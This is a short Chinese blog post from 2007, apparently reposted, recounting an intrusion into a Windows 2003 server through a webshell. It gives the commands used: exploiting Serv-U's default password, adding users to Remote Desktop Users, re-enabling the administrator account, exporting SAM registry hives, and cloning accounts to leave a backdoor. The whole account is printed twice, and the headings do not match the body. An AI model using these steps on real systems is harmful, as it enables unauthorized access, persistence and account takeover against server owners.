Windows 2003系统目前最完善最完美的安全权限方案
udf.dll提权工具
09/05/2007 14:59 | by
来源:b0r3d's Blog
今天朋友扔来一webshell让提权,SU默认密码没改,可执行命令,添加管理员后登陆,出现没有权限
估计是组策略设置了管理组没入终端登陆组,然后net localgroup "Remote Desktop Users" user /add
朋友说还不行,然后就准备reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
然后修改administrator密码登陆,晕,竟然给禁用了,
net user administrator /active:yes 启用管理员帐号登陆
还是没有权限,看来真的是默认管理组没有终端登陆权限,或者设置了默认管理员的权限
继续...net localgroup "remotedesktop users"查看终端用户
reg export HKLM\SAM\SAM\Domains\Account\Users c:\user.reg 把全部用户备份
然后随便修改一个终端组的用户密码登陆.yeah.成功.
然后把修改过的密码的帐号注册表文件全都导入,克隆帐号,留后门.
闪人...
今天朋友扔来一webshell让提权,SU默认密码没改,可执行命令,添加管理员后登陆,出现没有权限
估计是组策略设置了管理组没入终端登陆组,然后net localgroup "Remote Desktop Users" user /add
朋友说还不行,然后就准备reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
然后修改administrator密码登陆,晕,竟然给禁用了,
net user administrator /active:yes 启用管理员帐号登陆
还是没有权限,看来真的是默认管理组没有终端登陆权限,或者设置了默认管理员的权限
继续...net localgroup "remotedesktop users"查看终端用户
reg export HKLM\SAM\SAM\Domains\Account\Users c:\user.reg 把全部用户备份
然后随便修改一个终端组的用户密码登陆.yeah.成功.
然后把修改过的密码的帐号注册表文件全都导入,克隆帐号,留后门.
闪人...
http://www.dongjiannongdream.zoomshare.com
2007. 9. 07. 北京